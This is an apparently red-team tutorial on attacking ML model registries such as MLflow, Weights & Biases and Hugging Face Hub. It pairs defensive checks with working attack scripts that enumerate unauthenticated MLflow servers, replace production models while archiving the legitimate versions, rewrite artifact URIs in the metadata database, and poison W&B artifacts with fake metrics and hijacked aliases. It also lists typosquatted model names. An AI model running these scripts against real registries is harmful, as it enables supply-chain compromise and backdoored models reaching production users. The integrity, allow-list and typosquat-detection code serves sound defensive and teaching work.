Poisoning Model Registries
Advanced techniques for attacking model registries such as MLflow, Weights & Biases, and Hugging Face Hub, including model replacement attacks, metadata manipulation, artifact poisoning, and supply chain compromise through registry infrastructure.
Model registries are the central distribution point for ML models within an organization. Platforms such as MLflow, Weights & Biases, and internal registries serve as the authoritative source for which model version runs in production.
Compromising a model registry lets an attacker replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the training pipeline.
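One reason a registry compromise propagates so directly is that consumers often load models through a mutable reference rather than a fixed version. In MLflow, `models:/<name>/<version>` names a specific version, while `models:/<name>/<stage>` (including `latest`) and `models:/<name>@<alias>` resolve to whatever the registry currently says. The following is a minimal sketch of a check that tells the two apart; the function name and the category labels are illustrative assumptions, not part of MLflow.

```python
def classify_model_reference(uri: str) -> str:
    """Classify an MLflow `models:/` URI as 'pinned', 'stage', or 'alias'.

    Hypothetical helper for reviewing deployment configs; it only inspects
    the string and never contacts a registry.
    """
    prefix = "models:/"
    if not uri.startswith(prefix):
        raise ValueError(f"not a models:/ URI: {uri!r}")
    ref = uri[len(prefix):]

    # models:/<name>@<alias> resolves through a mutable alias
    if "@" in ref:
        return "alias"

    name, sep, suffix = ref.rpartition("/")
    if not sep or not name or not suffix:
        raise ValueError(f"malformed models:/ URI: {uri!r}")

    # A purely numeric suffix is a concrete version number
    if suffix.isdigit():
        return "pinned"

    # Anything else is a stage name (e.g. Production) or 'latest'
    return "stage"


if __name__ == "__main__":
    for example in (
        "models:/fraud-detector/7",
        "models:/fraud-detector/Production",
        "models:/fraud-detector@champion",
    ):
        print(example, "->", classify_model_reference(example))
```

A pinned version number narrows the exposure but does not remove it: the artifact behind that version can still be swapped in storage or in the metadata database, which is why a hash check at load time remains necessary.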
Model Registry Architecture
Common Registry Platforms
| Platform | Storage backend | API type | Authentication | Typical deployment |
|---|---|---|---|---|
| MLflow | S3, GCS, Azure Blob, local FS | REST API | Token-based (often none for OSS) | Self-hosted, Databricks managed |
| Weights & Biases | W&B cloud, S3 | REST + GraphQL | API key | SaaS, self-hosted server |
| Hugging Face Hub | HF cloud storage | REST API + Git LFS | Token-based | SaaS, on-prem mirror |
| Vertex AI Model Registry | GCS | gRPC + REST | IAM | GCP managed |
| SageMaker Model Registry | S3 | AWS API | IAM | AWS managed |
| Custom (internal) | Varies | REST API | Varies | Self-hosted |
Attack Surface Map
┌─────────────────────────────────────────────────┐
│                 Model Registry                  │
│                                                 │
│  ┌──────────────┐    ┌───────────────────────┐  │
│  │  API Layer   │    │  Web UI / Dashboard   │  │
│  │ (REST/gRPC)  │    │  (metadata browsing)  │  │
│  └──────┬───────┘    └───────────┬───────────┘  │
│         │                        │              │
│  ┌──────┴────────────────────────┴───────────┐  │
│  │            Metadata Store (DB)            │  │
│  │ - Model versions, stages, tags            │  │
│  │ - Run links, metric history               │  │
│  │ - Artifact URIs (pointers to storage)     │  │
│  └─────────────────────┬─────────────────────┘  │
│                        │                        │
│  ┌─────────────────────┴─────────────────────┐  │
│  │         Artifact Storage Backend          │  │
│  │ - S3 bucket / GCS bucket                  │  │
│  │ - Model weights (.pt, .bin, .safetensors) │  │
│  │ - Config files, tokenizers                │  │
│  └───────────────────────────────────────────┘  │
└─────────────────────────────────────────────────┘
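The diagram shows that the metadata store holds only pointers (artifact URIs) into the storage backend, so whoever controls a pointer controls what a consumer ends up loading. A consumer-side guard could refuse any URI that resolves outside storage the organization trusts. The sketch below assumes a hypothetical allow-list, `TRUSTED_ARTIFACT_ROOTS`, with made-up bucket names; it illustrates the idea and is not a feature of any registry.

```python
from urllib.parse import urlparse

# Hypothetical allow-list of storage prefixes this organization trusts.
TRUSTED_ARTIFACT_ROOTS = (
    "s3://ml-prod-artifacts/models/",
    "gs://ml-prod-artifacts/models/",
)


def is_trusted_artifact_uri(uri: str, trusted_roots=TRUSTED_ARTIFACT_ROOTS) -> bool:
    """Return True only if `uri` points inside one of the trusted roots."""
    parsed = urlparse(uri)

    # Reject path traversal such as .../models/../elsewhere/
    if ".." in parsed.path.split("/"):
        return False

    for root in trusted_roots:
        root_parsed = urlparse(root)
        # Scheme and bucket must match exactly; a prefix match on the
        # bucket name alone would accept "ml-prod-artifacts-evil".
        same_store = (parsed.scheme, parsed.netloc) == (
            root_parsed.scheme,
            root_parsed.netloc,
        )
        if same_store and parsed.path.startswith(root_parsed.path):
            return True
    return False


if __name__ == "__main__":
    print(is_trusted_artifact_uri("s3://ml-prod-artifacts/models/fraud/7/model.safetensors"))
    print(is_trusted_artifact_uri("s3://attacker-bucket/models/fraud/7/model.safetensors"))
```

A check like this only constrains where an artifact comes from. It says nothing about whether the bytes at that location were replaced, so it complements rather than replaces hash or signature verification.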
MLflow Registry Attacks
Unauthenticated Access
MLflow's open-source tracking server ships with authentication disabled by default. Organizations often deploy it on internal networks on the assumption that network isolation provides sufficient protection:
import requests


def enumerate_mlflow_registry(mlflow_url: str) -> dict:
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": None,  # unknown until the server answers
        "models": [],
        "artifact_stores": set(),
    }

    # Test unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
    except requests.exceptions.RequestException as exc:
        # Covers connection failures and timeouts alike
        findings["error"] = f"Request failed: {exc}"
        findings["artifact_stores"] = []
        return findings

    if resp.status_code == 200:
        findings["auth_required"] = False
        for model in resp.json().get("registered_models", []):
            model_info = {
                "name": model["name"],
                "latest_versions": [],
                "tags": model.get("tags", []),
            }
            for version in model.get("latest_versions", []):
                artifact_uri = version.get("source", "")
                model_info["latest_versions"].append({
                    "version": version["version"],
                    "stage": version.get("current_stage", "None"),
                    "source": artifact_uri,
                    "status": version.get("status", ""),
                })
                # Extract the artifact store location (bucket) from cloud URIs
                for scheme in ("s3://", "gs://"):
                    if artifact_uri.startswith(scheme):
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"{scheme}{bucket}")
            findings["models"].append(model_info)
    elif resp.status_code in (401, 403):
        findings["auth_required"] = True

    # Sets are not JSON-serializable; return a sorted list instead
    findings["artifact_stores"] = sorted(findings["artifact_stores"])
    return findings

Model Version Replacement
With write access to the MLflow API, an attacker can replace a production model by creating a new version or changing the stage assignment:
import mlflow
from mlflow.tracking import MlflowClient


def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()

    # Step 1: Create a new run with the malicious model.
    # Log under the "model" artifact path so it matches the runs:/ URI below.
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path, artifact_path="model")
        run_id = run.info.run_id
    artifact_uri = f"runs:/{run_id}/model"

    # Step 2: Register as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )

    # Step 3: Transition to Production stage.
    # Stages are deprecated in recent MLflow releases in favor of aliases,
    # but many deployments still resolve models by stage.
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )

    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation
MLflow stores artifact locations as URIs in its metadata database. Manipulating these URIs redirects model consumers to attacker-controlled artifacts:
import sqlalchemy


def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata database
    to redirect model loading to an attacker-controlled location.
    This attack bypasses API-level controls by targeting the database directly.
    Requires database access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
    """
    engine = sqlalchemy.create_engine(mlflow_db_connection)

    # engine.begin() opens a transaction and commits it on successful exit
    with engine.begin() as conn:
        # Update the source URI for the target model version
        result = conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            },
        )

    return {
        "action": "artifact_uri_redirected",
        "new_uri": malicious_uri,
        "rows_updated": result.rowcount,
    }

Weights & Biases Attack Surface
API Key Exploitation
W&B API keys grant broad access to an organization's experiment data, model artifacts, and project configurations:
from itertools import islice

import wandb


def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    Assess the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    findings = []

    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()

    # Enumerate projects visible to the key's default entity
    try:
        projects = list(islice(api.projects(), 20))
    except Exception as e:
        return [{"error": str(e)}]

    for project in projects:
        path = f"{project.entity}/{project.name}"

        # Sample a few runs from each accessible project
        try:
            for run in islice(api.runs(path=path, per_page=5), 5):
                findings.append({
                    "type": "accessible_run",
                    "project": run.project,
                    "entity": run.entity,
                    "state": run.state,
                    "created_at": str(run.created_at),
                })
        except Exception as e:
            findings.append({"error": f"runs in {path}: {e}"})

        # Check for model artifact access
        try:
            for collection in api.artifact_collections(path, "model"):
                findings.append({
                    "type": "model_collection",
                    "project": path,
                    "name": collection.name,
                })
        except Exception as e:
            findings.append({"error": f"artifacts in {path}: {e}"})

    return findings

Artifact Poisoning via W&B
import wandb


def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines use 'latest' or 'best' aliases,
    the poisoned version will be automatically consumed.
    """
    run = wandb.init(entity=entity, project=project, job_type="model-upload")
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    # Logging with existing aliases moves them onto the new version
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
    run.finish()
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub Attack Vectors
Model Card and README Injection
Model cards on the Hugging Face Hub are Markdown README files rendered as HTML, which creates opportunities for social engineering and redirection:
from huggingface_hub import HfApi

# Extensions that usually indicate pickle-based serialization
UNSAFE_EXTENSIONS = (".pkl", ".pickle", ".bin", ".pt", ".pth", ".ckpt")


def assess_hf_model_security(model_id: str):
    """
    Assess security characteristics of a Hugging Face Hub model.
    Check for suspicious configurations, unsafe serialization formats,
    and metadata inconsistencies.
    """
    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
    findings = []

    # Check serialization format
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith(UNSAFE_EXTENSIONS)]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle-based)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })

    # Check security scan results (populated when securityStatus=True)
    security_status = getattr(info, "security_repo_status", None)
    if security_status is not None:
        findings.append({"security_scan": security_status})

    # Check model card metadata; reuse the info object already fetched
    card = info.card_data
    if card:
        findings.append({
            "model_card": "present",
            "license": getattr(card, "license", "unknown"),
            "tags": getattr(card, "tags", []),
        })
    else:
        findings.append({"model_card": "missing or unparseable"})

    return findings

Typosquatting and Name Confusion
# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",  # capital I in place of lowercase l
        "meta-llama/LLama-3-8B",  # capitalization
        "meta_llama/Llama-3-8B",  # underscore vs hyphen
        "meta-llama/Llama-3-8b",  # case change
        "meta-llama/Llama3-8B",   # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # capital I in place of lowercase i
        "openai/whisper-Iarge-v3",  # capital I in place of lowercase l
    ],
}

| Attack vector | Platform | Difficulty | Detection |
|---|---|---|---|
| Unauthenticated API access | MLflow (OSS) | Low | Network monitoring |
| Model version replacement | MLflow, W&B | Medium | Version audit logs |
| Artifact URI manipulation | MLflow (DB access) | Medium | Database auditing |
| API key abuse | W&B, HF Hub | Low (if a key is found) | API access logs |
| Typosquatting | HF Hub | Low | Name-similarity scanning |
| Alias hijacking | W&B | Medium | Alias-change alerts |
| Metadata poisoning | All platforms | Low | Metadata validation |
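The name-similarity scanning that the table lists as the detection for typosquatting can be sketched with the standard library alone. The example below assumes a hypothetical allow-list, `TRUSTED_REPOS`, of repositories the organization intends to use. The confusable-character mapping and the 0.9 similarity threshold are illustrative choices, not tuned values.

```python
from difflib import SequenceMatcher

# Hypothetical allow-list of repositories the organization intends to use.
TRUSTED_REPOS = ["meta-llama/Llama-3-8B", "openai/whisper-large-v3"]

# Fold visually confusable characters onto one canonical form.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o", "_": "-"})


def normalize(repo_id: str) -> str:
    """Map look-alike characters together, then ignore case."""
    return repo_id.translate(CONFUSABLES).lower()


def find_typosquat_target(repo_id, trusted=TRUSTED_REPOS, threshold=0.9):
    """Return the trusted repo that `repo_id` appears to imitate, or None."""
    if repo_id in trusted:
        return None  # exact match with a trusted name

    candidate = normalize(repo_id)
    for known in trusted:
        reference = normalize(known)
        # Identical after normalization: a homoglyph or case variant
        if candidate == reference:
            return known
        # Near-identical: missing hyphen, version bump, single substitution
        if SequenceMatcher(None, candidate, reference).ratio() >= threshold:
            return known
    return None


if __name__ == "__main__":
    for name in ("meta-Ilama/Llama-3-8B", "meta-llama/Llama3-8B", "google/flan-t5-base"):
        print(name, "->", find_typosquat_target(name))
```

A scanner like this would typically run against dependency manifests or download logs. Because a fixed threshold will flag some legitimate sibling repositories, its hits are better treated as review prompts than as automatic blocks.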
Storage Backend Attacks
S3 Bucket Misconfigurations
Model registries often store artifacts in cloud storage with overly permissive access policies:
import boto3
from botocore.exceptions import ClientError

ALL_USERS_URI = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS_URI = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
MODEL_EXTENSIONS = (".pt", ".bin", ".safetensors", ".pkl", ".onnx")


def assess_model_bucket_security(bucket_name: str):
    """Assess S3 bucket security for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []

    # Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == ALL_USERS_URI:
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "permission": grant["Permission"],
                })
            elif grantee.get("URI") == AUTHENTICATED_USERS_URI:
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "permission": grant["Permission"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})

    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})

    # List model artifacts (first page only)
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if obj["Key"].endswith(MODEL_EXTENSIONS)
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})

    return findings

Registry Integrity Verification
Implementing Model Signing
Organizations should implement cryptographic signing for model artifacts to detect tampering. The minimal building block is a hash check against a known-good digest obtained from a trusted source outside the registry:
import hashlib
import hmac


def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
    # Stream the file in chunks so large weight files are not read into memory
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
    actual_hash = h.hexdigest()
    # Hex digests are lowercase; normalize the expected value before comparing
    matches = hmac.compare_digest(actual_hash, expected_hash.lower())
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

Related Topics
- Model Supply Chain Risks -- the broader supply chain attack landscape
- Pickle Deserialization Exploits -- exploiting unsafe model serialization
- Feature Store Manipulation -- attacking another ML data infrastructure component
- ML Pipeline CI/CD Attacks -- attacking the pipeline that feeds registries
- Attacking AI Deployments -- what happens after models leave the registry